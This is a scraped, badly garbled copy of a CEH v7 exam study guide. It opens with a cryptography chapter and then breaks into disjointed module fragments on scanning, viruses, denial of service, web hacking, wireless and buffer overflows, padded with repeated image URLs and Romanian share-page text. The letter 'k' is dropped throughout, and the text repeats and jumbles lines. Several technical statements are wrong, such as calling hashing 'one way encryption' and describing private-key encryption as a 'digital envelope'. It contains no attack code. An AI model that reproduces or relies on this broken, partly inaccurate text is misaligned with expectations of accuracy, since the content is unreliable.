http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Introduction and Definitions Cryptography is used to ma e data unreadable, literally meaning hidden writing . Th is is usually done by a mathematical algorithm which ta es information and turns it in to what is called cipher text, a process called encoding. For example: you can rotate the a lphabet by thirteen characters so that computer becomes pbzchgre, each letter is substitute d with the letter that is 13 places in front of it. This is a very basic method nown as RO T13. The plaintext is computer, the cipher text is pbzchgre, and the algorithm is rotating letters 13 places down the alphabet.
Cryptography is used to eep data confidential. In order to create a confidentia l method, the algorithm used requires a crypto-variable or ey. The use of a ey results in a unique algorithm; this allows multiple users to use a common algorithm while maintaining confident iality. Instead of using ROT13 as above it becomes ROTx where x can represent any number of rotations. When someone is authenticated to use the encrypted data they are give n the eys necessary to decrypt it and view the data. Cryptography is also used to provide data integrity and non-repudiation. Integrity is the ability to be sure that the data has not b een altered. Nonrepudiation is the ability to be sure that the data came from a certain source b y attaching a digital fingerprint to a message. Types of Cryptography Asymmetric Asymmetric encryption uses one ey to encrypt and different ey to decrypt. Thes e are the public and private eys. If something is encrypted with the private ey, it can only be dec rypted with the public ey. If something is encrypted with the public ey it can only be decrypted by t he private ey. The private ey is what the entity eeps private. When the private ey is used to en crypt a message it is effectively enclosed in a digital envelope . This provides non-repudiation; the ent ities involved now that only the holder of the private ey could have wrapped it with encryption th at is opened with a specific public ey. Li ewise, a message encrypted with an entities public ey c an only be read by the entity with the private ey, assuring the parties of confidentiality. It is impo rtant to remember is that the
eys in such a structure cannot be derived from each other.
Asymmetric encryption is used when the ey needs to be transmitted securely wher e it would be infeasible to do so out of band, such as in email encryption.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Symmetric Symmetric encryption uses the same ey for encryption and decryption. The entiti es using this ey have to ta e great care in protecting this ey; anyone with access to this ey can re ad any message that is encrypted with it. This ey is usually ept at a secure location and is transfer red out of band. Symmetric encryption is faster than using asymmetric. IPSEC is a good example w hich is used for VPN type traffic which requires a high rate of transmission. Hash Function A hash function is a one way method encryption. It does not require a ey. It is used to create a piece of cipher text which does not need to be decrypted. This is used to provide inte grity for a file, such as a chec sum. A piece of plaintext passed through an algorithm gives a message diges t hash, which can be used to prove that the plaintext is whole, proving integrity. Ciphers Bloc Ciphers Bloc Ciphers encrypt bloc s of data. Some ciphers can only use bloc s of certai n sizes, others are able to use variable bloc sizes. This cipher is slow, and is commonly used for large r sets of data. The ciphers wor by brea ing the data into bloc s of whatever size such as 160 bit bloc s, t hen encrypting each piece.
Stream Ciphers Stream ciphers encrypt continuous streams of data. These are often used in symme tric encryption for data that has to be transmitted quic er. This type of cipher does not require ce rtain data size bloc s.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Algorithms DES This bloc cipher was chosen in 1976 by the US NSA to be the U.S. Data Encryptio n Standard. DES uses a ey of 56 bits, thought at the time to be beyond the ability of any c omputer to brute force attac and determine the ey.
As computer power has increased in the last three decades the 56 bit ey is no l onger considered secure. Triple DES was created by ta ing the DES cipher algorithm and applying i t three times to each data bloc , with a different ey each time. This gives an effective ey len gth of 168.
RC Algorithms The RC algorithms are a set of symmetric- ey encryption algorithms invented by R on Rivest. RC4 is a widely used variable bit stream cipher. RC5 is a 32/64/128-bit bloc ci pher developed in 1994. RC6 is a 128-bit bloc cipher based heavily on RC5 created in 1997.
RSA RSA is a public- ey cipher used for both confidentiality and digital signatures, based on the difficulty of factoring large numbers.
AES
Message Hashes / Digests Message Digests or Messages Hashes are one way encryption of a bloc of data. Th is cipher text is called a Hash Value. If any bit in the original text changes every bit has a fif ty percent chance of also
AES is a symmetric- ey bloc cipher. It uses 128 bit bloc s and has a variable ey size of 128, 192 or 256 bits. AES is currently considered the standard for secure encryption.
changing, ma ing it infeasible for two documents to have the same hash value. Th ese values are used for verifying file or message integrity. They are also used as an identifier for files or persons where it is a bad idea to transmit a password.
Message Digest Ciphers
MD5 MD stands for Message Digest. MD5 has is a 32 digit hexadecimal number that can be used as a digital fingerprint or signature. It was shown to be wea to Collision Attac s i n 2008.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SHA The Secure Hashing Algorithm was created by the NSA as part of a U.S. Federal In formation Processing standard. SHA-1 produces a 160 bit digest from a message. It is very similar to MD5. SHA-2 has two different functions, SHA-256 which can produce an output of e ither 256 or 224 bit, and SHA-512 which can produce an output of either 512 or 384 bit. Th e NIST has stated that the Federal government is required to use SHA-2 functions after 2010 .
Examples of Message Digest Uses
SSL and TLS communication between clients and servers use Hash functions during the handsha e stage to start communication. The client as s the server for a secure connection and presents the list of has functions it can use. The server chooses the strongest one available that both can use and tells the client. The server then presents its digital certific ate, which has been generated using a hash function, to the client. The client can then chec the ce rtificate with the Trust authority. Once this is done the client encrypts a random number with the server s Public ey so that only the server can decrypt it. From that random number both server and client generate session eys to be used for the symmetric encryption.
SSH (Secure Shell) uses Public and Private Keys to authenticate uses and generat e a secure tunnel. You generate a ey pair using a tool li e PuTTY. The Public ey is store d on the SSH server that needs to be available for connection. Using a hash function you crea te a signature from your private ey, which only you could generate. When using SSH to log on t o the server you present this digital signature to the server who can verify it with the publ ic ey. The private ey is never transmitted.
Public Key Infrastructure (PKI)
PKI refers to all the bac ground parts needed to use digital certificates as a w
ay of equating public eys to entities using them.
Authorities
Registration Authority This entity handles the requests of an entity (server, computer, or person) to o btain a digital certificate
Certification Authority This entity generates and assigns certificate to entities. Also referred to as a Trusted Third Party (TTP)
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Validation Authority This entity handles the requests for confirmation that an entity is who they say they are when they present a digital certificate.
In some systems these entities may all be one server. The term PKI is sometimes used incorrectly to refer to the Certificate Authority (CA). The term digital certifi cate refers to the X.509 standard document used in PKI.
Examples of commercial Certification Authorities include VeriSign, Go Daddy, and Comodo.
PKI can also exist in a Web of Trust model, as implemented in the Pretty Good Pr ivacy free version of email encryption. A web of trust exists as a set of certificates that a user trusts and can be used with the commercial models as long as another Certificate Authority will bac the self-signed certificates as authentic.
Uses of PKI
PKI is used in both encrypted email and encrypted web traffic. In email encrypti on, a message can be run through a hash function which creates a hash value unique to the mess age. This function is added as a signature to the message. The message itself is encrypted with the recipients public ey, so that it can only be decrypted by that recipient using their private ey, ensuring Confidentiality. When the message is decrypted, the hash value can be d ecrypted using the senders Public ey, ensuring the Integrity of the email message.
In web traffic such as SSL and TLS, websites are issued certificates from Certif ication Authorities to use to handsha e and identify themselves to clients.
Dis Encryption Dis encryption refers to encrypting the data on a hard drive or other media. Wh en the data in storage is encrypted it assures confidentiality of the data. One best practice i s to encrypt all data bac ups when they are put onto removable media such as DVD or tape.
Our practice uses the free tool TrueCrypt for dis encryption. TrueCrypt also ha s the ability to create a hidden volume within an encrypted volume for plausible deniability. Thi s hidden volume cannot be detected unless supplied with the hidden volume passphrase.
http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Cryptography Attac s All cryptographic attac s assume that the person doing the attac has access to encrypted information.
Brute Force attac s attempt to try every possible ey for the cryptographic func tion. Success depends on how long the ey is, how much time the hac er has, and what other sec urity mechanisms are in place such as account loc out. The time and security mechanis ms can be bypassed by techniques such as using Rainbow tables against a stolen hash.
Known Plaintext attac s are those attac s where a hac er has the whole of plaint ext that has been encrypted and the associated cipher text. When an attac er has the whole en crypted messaged it is possible to figure out the algorithm used to encrypt the plaintex t.
Chosen Plaintext attac s occur when a hac er can chose a piece of plaintext and has access to the encryption function. Using the hac er s plaintext he can then ta e the generat ed cipher text and compare it to the plaintext to figure out a ey.
Chosen Ciphertext attac s occur when a hac er has the ability to ta e a piece of Ciphertext and decrypt it, then analyze the output. This is similar to the newspaper style puzz les where you have a method of how the message is setup and the encrypted message.
Social Engineering attac s such as phishing or shoulder surfing can give an atta c er the passwords or eys used in encryption by ta ing advantage of users in question.
While attac s against the ciphers themselves occur often it is quic er to attac the implementation or the person who uses the encryption instead. These methods are called Side Channel attac s.
Rubber Hose attac s refer to using physical violence against someone who has no wledge of the encryption eys to force them to reveal those eys.

CEH 7.2 Supplemental Study Guide for Footprinting and Scanning Networks

Încărcat de

Informații document

Descriere originală:

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

CEH 7.2 Supplemental Study Guide for Footprinting and Scanning Networks

Încărcat de

Drepturi de autor:

Formate disponibile

C|EH 7.

Note: The CEH exam expects you to have

nowledge of standard ports.

Understanding CEH Scanning Methodology

Networ Scan- Identifies active hosts on a networ

well, I gotta go , (FIN),

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg UDP Scanning

Live hosts on a networ

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 5 System Hac ing Study Guide Objectives:

Design - Developing virus code using programming languages or construction

Indications of a Virus attac

Multipartite Viruses attempt to attac r program files at the same time.

both the boot sector and the executable o

Isolate the system from the networ

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

Phases in a Social Engineering Attac

Common Intrusion Tactics and Strategies for Prevention

Malicious users can gather information by impersonating others on social networ s.

Attac er s Tactics Combat Strategy

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

Module 10 Denial of Service Study Guide Objectives:

Symptoms of a DoS Attac

DoS Attac Techniques

ICMP Flood attac

Sequence number Prediction attac s use this

nowledge of the handsha e to send a

using Pac et Sniffers

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg IPSec

Module 12 Hac ing Webservers Study Guide Objectives:

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

. Web Application Components

. Web Application Architecture

. Cross-Site Scripting (XSS) Attac s

. Hidden Field Manipulation Attac

. How Web Applications Wor

. Hac ing Methodology

. Web Application Hac ing Tools

. How to Defend Against Web Application Attac s

. Web Application Security tools

. Web Application Firewalls

. Web Application Pen Testing

. Web Services Attac

Parameters should be validated against a

positive specification that defines:

Web Services Attac

ng B2B (business to business) chains using the so-called SOA model.

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

6. Move on to compromise the networ

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg SQL Injection Tools

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Module 15 Wireless Networ s Study Guide Objectives:

Evil Twin Attac

anonymously through the OBEX protocol.

eys and using the decrypted eys for replay attac s.

Wireless Pen Testing Framewor

networ traffic loo s li e, on

File Integrity chec ing

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

Module 1 7 Buffer Overflows Study Guide Objectives:

Smashing the Stac

eys in such a structure cannot be derived from each other.

Message Digest Ciphers